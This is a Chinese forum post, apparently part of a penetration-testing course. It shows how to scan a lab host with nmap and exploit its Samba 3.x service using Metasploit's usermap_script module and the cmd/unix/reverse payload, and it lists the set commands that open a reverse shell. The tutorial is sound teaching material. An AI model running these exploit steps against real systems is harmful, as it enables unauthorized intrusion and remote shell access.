用户
搜索
  • TA的每日心情
    慵懒
    3 天前
  • 签到天数: 44 天

    连续签到: 1 天

    [LV.5]常住居民I

    管理员

    Rank: 9Rank: 9Rank: 9

    66

    主题

    200

    帖子

    1764

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2018-8-22

    春秋达人积极活跃奖

    发表于 2020-10-29 17:25:52 75821
    本帖最后由 M0x1n 于 2020-10-30 17:04 编辑


    视频地址:https://www.bilibili.com/video/BV1GT4y1F7nU?p=5 下一篇:敬请期待更新!!

    0x01前言:  

    上节课我们已经部署了漏洞环境,我们现在就可以长驱直入的去进行一个复现攻击。
    0x02信息收集和利用:

       1.png
      首先少不了的当然是先扫描一波啦,之前可能没有提到Nmap,Nmap也是可以在msfconsole里调用的,当然前提是你必须安装了它。
    2.png

    可以看到开放了这么多的端口,我们慢慢的查看这些端口的服务,发现139和445端口开放了Samba3.x的服务,这里我就不再介绍Samba服务(www.baidu.com)。

      我们现在就搜索一下关于samba的漏洞利用模块。
    3.png

    我们这里使用exploit/multi/samba/usermap_script,因为这个被标记为“Excellent”,并且符合这个系统的发布时间,所以我们就直接使用这个模块。
    4.png

    然后我们就需要设置一下攻击载荷(Payloads)
    5.png

    我们选择使用基础的cmd/unix/reverse反向攻击载荷模块。
      set PAYLOAD cmd/unix/reverse
      
    设置被攻击主机的IP地址
      set RHOST 192.168.1.4
      
    设置漏洞利用的端口号
      set RPORT 445
      
    设置发动攻击主机的IP地址(公网复现需要双方公网的IP地址~小声BB,请授权后使用。)
      set LHOST 192.168.1.3
      
    在设置完上面的所有参数变量后,我们输入exploit或者run,即可发动攻击。
    6.png

    如果提示这个,请点击允许访问。
    7.png

    随后可以看到我们已经和这台机器建立了一个Shell连接,渗透Windows系统的过程也与之类似。唯一的差别是选择漏洞利用模块和攻击载荷模块不一样。
    总结:
          我们今天也是成功的学习到了如何使用Metasploit进行渗透攻击,我们慢慢的会了解到更多的东西,但是还请看官们多尝试一些Exploit和Payload的组合,然后加深一下理解和记忆。

    末心网络安全团队 | Q群374327762 | QQ1044631097
    发表于 2020-10-30 17:06:44
    版主最近也是有点小忙,所以更新下一篇会比较慢吧,然后最近也在整理我们破团队的一些文章,所以就委屈各位看官了!
    末心网络安全团队 | Q群374327762 | QQ1044631097
    使用道具 举报 回复
    发表于 2020-10-29 17:29:16
    下一篇就讲Metasploit的后渗透攻击了,大家做好准备!~
    末心网络安全团队 | Q群374327762 | QQ1044631097
    使用道具 举报 回复
    发表于 2020-10-30 09:43:17
    来和妲己玩耍吧
    使用道具 举报 回复
    发表于 2020-10-30 10:24:36

    红日,被我射击醒了,所以今天是周一。
    末心网络安全团队 | Q群374327762 | QQ1044631097
    使用道具 举报 回复
    鲁班大师,智商250,
    使用道具 举报 回复
    发表于 2020-10-30 17:05:55

    正在研究如何突破地心引力!
    末心网络安全团队 | Q群374327762 | QQ1044631097
    使用道具 举报 回复
    发表于 2020-10-31 17:57:57
    nb
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册